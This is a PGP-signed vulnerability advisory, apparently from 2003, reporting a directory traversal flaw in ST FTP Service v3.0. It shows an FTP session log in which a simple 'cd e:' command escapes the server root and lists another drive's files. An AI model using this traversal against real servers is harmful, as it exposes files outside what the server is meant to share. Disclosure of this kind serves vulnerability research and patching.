-----BEGIN PGP SIGNED MESSAGE----- ################################################################* # Damage Hacking Group security advisory # www.dhgroup.org ################################################################* #Product: ST FTP Service v3.0 #Authors: [stsoft.newmail.ru] #Vulnerability: directory traversal ################################################################* #Overview#------------------------------------------------------# Easy russian ftp server for home network. #Problem#-------------------------------------------------------# Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\>ftp 127.0.0.1 Connected to 127.0.0.1. 220- 220 Service ready for new user. User (127.0.0.1:(none)): 230 User logged in, proceed. ftp> pwd 257 "/" is working directory. ftp> ls 200 PORT command okay. 150 File status okay; about to open data connection. 226 Closing data connection. ftp> cd e: 250 Requested file action okay, completed. ftp> pwd 257 "e:" is working directory. ftp> ls 200 PORT command okay. 150 File status okay; about to open data connection. 03-05-03 12:58PM <DIR> video 05-21-03 05:46PM 267964416 hiberfil.sys 02-18-03 04:18AM <DIR> Documents and Settings 03-11-03 12:00PM <DIR> Program Files 05-21-03 05:46PM 402653184 pagefile.sys 02-18-03 07:31AM <DIR> System Volume Information 02-18-03 07:37AM <DIR> Recycled 04-27-03 05:21PM 214 firewall.log 03-09-03 07:09PM <DIR> WINDOWS 01-03-02 10:15PM <DIR> shit 01-12-02 12:10AM <DIR> MSSQL7 226 Closing data connection. ftp: 579 bytes received in 0,00Seconds 579000,00Kbytes/sec. ftp> bye 221- 221 Service closing control connection. C:\> #Exploit#--------------------------------------------------------# none #wow#------------------------------------------------------------# %$#@ www.dhgroup.org -=> opened English version! Come on in :) #eof Best regards www.dhgroup.org D4rkGr3y icq 540981 -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQCVAwUBPsxG/m4LIpseSJmPAQG0hwP/ZpIWo49+6nYRFwR64dgNa+KLbKAP4Qcr Fz8l9go1AcYZi3ouGDQ9AwcpwapMsJwcUtkwpw1f+ZGfXiLO2BWRwc2aFL0FEDYi 8HsUYvXp6x4x9b/WvoNh4/MCvROTH07dopKbrn7gaj8iPPsiV2NUIds2LLFgqHrt h0z6aR0rDGo= =qa0l -----END PGP SIGNATURE-----
